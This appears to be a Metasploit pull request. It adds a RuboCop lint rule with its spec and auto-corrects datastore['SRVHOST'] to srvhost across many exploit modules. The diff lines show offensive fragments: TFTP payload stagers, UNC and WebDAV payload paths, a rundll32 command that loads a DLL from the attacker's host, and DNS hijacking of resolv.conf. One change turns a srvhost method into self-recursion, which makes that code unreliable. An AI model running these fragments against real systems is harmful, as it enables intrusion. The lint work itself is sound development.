   def exploit
-    srv_ip_for_client = datastore['SRVHOST']
+    srv_ip_for_client = srvhost
     if srv_ip_for_client == '0.0.0.0'
       if datastore['LHOST']
         srv_ip_for_client = datastore['LHOST']

--- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb
+++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
     src_port = datastore['SRVPORT'].to_i
 
     # Prepare active mode: Convert the IP and port for active mode

--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_ip_for_client = datastore['SRVHOST']
+    srv_ip_for_client = srvhost
     if srv_ip_for_client == '0.0.0.0'
       if datastore['LHOST']
         srv_ip_for_client = datastore['LHOST']

--- a/modules/exploits/windows/ftp/labf_nfsaxe.rb
+++ b/modules/exploits/windows/ftp/labf_nfsaxe.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_ip_for_client = datastore['SRVHOST']
+    srv_ip_for_client = srvhost
     if srv_ip_for_client == '0.0.0.0'
       if datastore['LHOST']
         srv_ip_for_client = datastore['LHOST']

--- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb
+++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address : srvhost
     src_port = datastore['SRVPORT'].to_i
 
     # Prepare active mode: Convert the IP and port for active mode

--- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb
+++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_cmd(['TYPE', 'I'], true, conn)
 
     # Prepare active mode: Get attacker's IP and source port
-    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
+    src_ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address("50.50.50.50") : srvhost
     src_port = datastore['SRVPORT'].to_i
 
     # Prepare active mode: Convert the IP and port for active mode

--- a/modules/exploits/windows/ftp/scriptftp_list.rb
+++ b/modules/exploits/windows/ftp/scriptftp_list.rb
@@ -74,10 +74,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def setup
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       lhost = Rex::Socket.source_address('50.50.50.50')
     else
-      lhost = datastore['SRVHOST']
+      lhost = srvhost
     end
 
     ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"

--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/windows/http/cogent_datahub_command.rb
+++ b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -401,10 +401,10 @@ class MetasploitModule < Msf::Exploit::Remote
       @extensions = "dll"
       @system_commands_file = rand_text_alpha_lower(4)
 
-      if (datastore['SRVHOST'] == '0.0.0.0')
+      if (srvhost == '0.0.0.0')
         @myhost = Rex::Socket.source_address('50.50.50.50')
       else
-        @myhost = datastore['SRVHOST']
+        @myhost = srvhost
       end
 
       @exploit_unc = "\\\\#{@myhost}\\"

--- a/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
+++ b/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb
@@ -77,11 +77,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def srv_host
-    if (datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::')
+    if (srvhost == '0.0.0.0') || (srvhost == '::')
       return datastore['URIHOST'] || Rex::Socket.source_address(rhost)
     end
 
-    return datastore['SRVHOST']
+    return srvhost
   end
 
   def check
@@ -217,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Start a server to handle the reverse FTP connection
     ftp_server = Rex::Socket::TcpServer.create(
       'LocalPort' => datastore['SRVPORT_FTP'],
-      'LocalHost' => datastore['SRVHOST'],
+      'LocalHost' => srvhost,
       'Comm' => select_comm,
       'Context' => {
         'Msf' => framework,

--- a/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
+++ b/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb
@@ -208,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def srvhost
-    datastore['SRVHOST']
+    srvhost
   end
 
   def primer

--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
+++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
@@ -403,7 +403,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @extensions = "exe"
     @system_commands_file = rand_text_alpha_lower(4)
 
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
 
     @exploit_unc = "\\\\#{myhost}\\"
 

--- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
+++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Generate a download+exe JSP payload
   #
   def generate_jsp_payload
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : srvhost
     my_port = datastore['SRVPORT']
 
     # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\
@@ -237,7 +237,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     begin
       t = framework.threads.spawn("reqs", false) { inject_exec }
-      print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+      print_status("Serving executable on #{srvhost}:#{datastore['SRVPORT']}")
       super
     ensure
       t.kill

--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error('No reply')
       end
     when :win_dropper
-      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
       execute_cmdstager(
         temp: '.',
         linemax: 1_400,

--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -344,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
       res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
 
       # Use the CMD stager to get a payload running
-      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
       execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
 
       # Save these file names for later deletion

--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -178,7 +178,7 @@ Processor-Speed=#{processor_speed}
     # CmdStagerVBS was tested here as well, however delivery took roughly
     # 30 minutes and required sending almost 350 notification messages.
     # size constraint requirement for SQLi is: linemax => 393
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
   end
 

--- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("File available on #{unc}...")
     vprint_status("#{peer} - Trying to execute remote EXE...")
 
-    lhost = "#{datastore['SRVHOST']}"
+    lhost = "#{srvhost}"
     lhostfull = ""
     lhost.each_char do |character|
       lhostfull = lhostfull << "\x00" << character

--- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
+++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
@@ -269,7 +269,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def primer
     basename = rand_text_alpha(3)
     share_name = rand_text_alpha(3)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     exploit_unc = "\\\\#{myhost}\\"
 
     vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll")

--- a/modules/exploits/windows/misc/mini_stream.rb
+++ b/modules/exploits/windows/misc/mini_stream.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     # Calculate the correct offset
-    host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     host << ":#{datastore['SRVPORT']}/"
     offset = target['Offset'] - host.length
 

--- a/modules/exploits/windows/misc/nvidia_mental_ray.rb
+++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     @listener = Rex::Socket::TcpServer.create(
-      'LocalHost' => datastore['SRVHOST'],
+      'LocalHost' => srvhost,
       'LocalPort' => port,
       'Comm' => comm,
       'Context' => {

--- a/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb
+++ b/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if (request.uri =~ /vmhgfs\.dll$/i)
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("PROPFIND #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
@@ -340,7 +340,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
 
     @exploit_unc = "\\\\#{myhost}\\"
 

--- a/modules/exploits/windows/misc/webdav_delivery.rb
+++ b/modules/exploits/windows/misc/webdav_delivery.rb
@@ -58,9 +58,9 @@ class MetasploitModule < Msf::Exploit::Remote
       if datastore['SRVPORT'] != 443
         fail_with(Failure::BadConfig, 'SRVPORT must be 443')
       end
-      webdav = "#{datastore['SRVHOST']}@ssl"
+      webdav = "#{srvhost}@ssl"
     else
-      webdav = "#{datastore['SRVHOST']}@#{datastore['SRVPORT']}"
+      webdav = "#{srvhost}@#{datastore['SRVPORT']}"
     end
     print_line("rundll32.exe \\\\#{webdav}\\ANYTHING,Init")
   end

--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     method = datastore['METHOD'].downcase
 
     if (method =~ /^cmd/)
-      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
       execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
     else
       # Generate the EXE, this is the same no matter what delivery mechanism we use

--- a/modules/exploits/windows/novell/netiq_pum_eval.rb
+++ b/modules/exploits/windows/novell/netiq_pum_eval.rb
@@ -140,10 +140,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def lookup_lhost()
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address('50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 

--- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
+++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
@@ -202,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def setup_resources
     if datastore['UNCPATH'].blank?
       # Using WebDAV
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
       @basename = rand_text_alpha(3)
       @share_name = rand_text_alpha(3)
       @exploit_unc = "\\\\#{my_host}\\"

--- a/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
+++ b/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("#{peer} - Got a path to drop our shell: #{shell_path}")
 
     # Start http server for project copy callback
-    http_service = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
+    http_service = "http://#{srvhost}:#{datastore['SRVPORT']}"
     print_status("#{peer} - Starting up our web service on #{http_service} ...")
 
     start_service({
@@ -214,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Project Copy Request: target will connect to us to obtain project information.
     print_status("#{peer} - Initiating project copy request...")
-    url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1"
+    url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{srvhost}:#{datastore['SRVPORT']}&1"
     res = send_to_factory(url)
 
     # wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish

--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -101,10 +101,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha(4)
     @temp_folder = "C:/Windows/Temp"
 
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       lhost = Rex::Socket.source_address('50.50.50.50')
     else
-      lhost = datastore['SRVHOST']
+      lhost = srvhost
     end
 
     payload_src = lhost

--- a/modules/post/linux/busybox/set_dns.rb
+++ b/modules/post/linux/busybox/set_dns.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Post
 
   def modify_resolv_conf
     print_status('File /etc/resolv.conf found')
-    if busy_box_write_file('/etc/resolv.conf', "nameserver #{datastore['SRVHOST']}", false)
+    if busy_box_write_file('/etc/resolv.conf', "nameserver #{srvhost}", false)
       print_good('DNS server added to resolv.conf')
     end
   end
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post
   def modify_udhcpd_conf
     print_status('File /etc/udhcpd.conf found')
 
-    if busy_box_write_file('/etc/udhcpd.conf', "option dns #{datastore['SRVHOST']}", true)
+    if busy_box_write_file('/etc/udhcpd.conf', "option dns #{srvhost}", true)
       restart_dhcpd('/etc/udhcpd.conf')
     else
       print_status('Unable to write udhcpd.conf, searching a writable directory...')
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Post
         cmd_exec("cp -f /etc/udhcpd.conf #{writable_directory}tmp.conf")
         Rex.sleep(0.3)
         print_status("Adding DNS to #{writable_directory}tmp.conf")
-        busy_box_write_file("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", true)
+        busy_box_write_file("#{writable_directory}tmp.conf", "option dns #{srvhost}", true)
         restart_dhcpd("#{writable_directory}tmp.conf")
       else
         print_error('Writable directory not found')

--- a/spec/rubocop/cop/lint/datastore_srvhost_usage_spec.rb
+++ b/spec/rubocop/cop/lint/datastore_srvhost_usage_spec.rb
@@ -1,0 +1,87 @@
+# frozen_string_literal: true
+
+require 'rubocop/cop/lint/datastore_srvhost_usage'
+require 'rubocop/rspec/support'
+
+RSpec.describe RuboCop::Cop::Lint::DatastoreSrvhostUsage, :config do
+  subject(:cop) { described_class.new(config) }
+
+  let(:config) { RuboCop::Config.new }
+
+  it 'corrects datastore[\'SRVHOST\'] with single quotes' do
+    expect_offense(<<~RUBY)
+      datastore['SRVHOST']
+      ^^^^^^^^^^^^^^^^^^^^ Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+    RUBY
+
+    expect_correction(<<~RUBY)
+      srvhost
+    RUBY
+  end
+
+  it 'corrects datastore["SRVHOST"] with double quotes' do
+    expect_offense(<<~RUBY)
+      datastore["SRVHOST"]
+      ^^^^^^^^^^^^^^^^^^^^ Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+    RUBY
+
+    expect_correction(<<~RUBY)
+      srvhost
+    RUBY
+  end
+
+  it 'corrects datastore[\'SRVHOST\'] in assignments' do
+    expect_offense(<<~RUBY)
+      host = datastore['SRVHOST']
+             ^^^^^^^^^^^^^^^^^^^^ Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+    RUBY
+
+    expect_correction(<<~RUBY)
+      host = srvhost
+    RUBY
+  end
+
+  it 'corrects datastore["SRVHOST"] in comparisons' do
+    expect_offense(<<~RUBY)
+      if datastore["SRVHOST"] == '0.0.0.0'
+         ^^^^^^^^^^^^^^^^^^^^ Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+        do_something
+      end
+    RUBY
+
+    expect_correction(<<~RUBY)
+      if srvhost == '0.0.0.0'
+        do_something
+      end
+    RUBY
+  end
+
+  it 'corrects datastore[\'SRVHOST\'] in method calls' do
+    expect_offense(<<~RUBY)
+      bind(datastore['SRVHOST'], port)
+           ^^^^^^^^^^^^^^^^^^^^ Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+    RUBY
+
+    expect_correction(<<~RUBY)
+      bind(srvhost, port)
+    RUBY
+  end
+
+  it 'does not flag other datastore accesses' do
+    expect_no_offenses(<<~RUBY)
+      datastore['SRVPORT']
+    RUBY
+  end
+
+  it 'does not flag srvhost method calls' do
+    expect_no_offenses(<<~RUBY)
+      host = srvhost
+    RUBY
+  end
+
+  it 'does not flag other variables named datastore' do
+    expect_no_offenses(<<~RUBY)
+      my_datastore['SRVHOST']
+    RUBY
+  end
+end


### PR DESCRIPTION
First commit adds the rule; second commit runs bundle exec rubocop -a --only Lint/DatastoreSrvhostUsage

I've added # rubocop:disable Lint/DatastoreSrvhostUsage to the place where lookup is allowed, and but it looks there's a few other places that do similar adhoc resolution/validation logic where there might be variable shadowing, so I've left the result as-is for a pit stop review before swapping anything additional around. I'm happy for you to git cherry-pick just the linting rule, make tweaks, and rerun bundle exec rubocop -a --only Lint/DatastoreSrvhostUsage, etc, or whatever works best for your workflow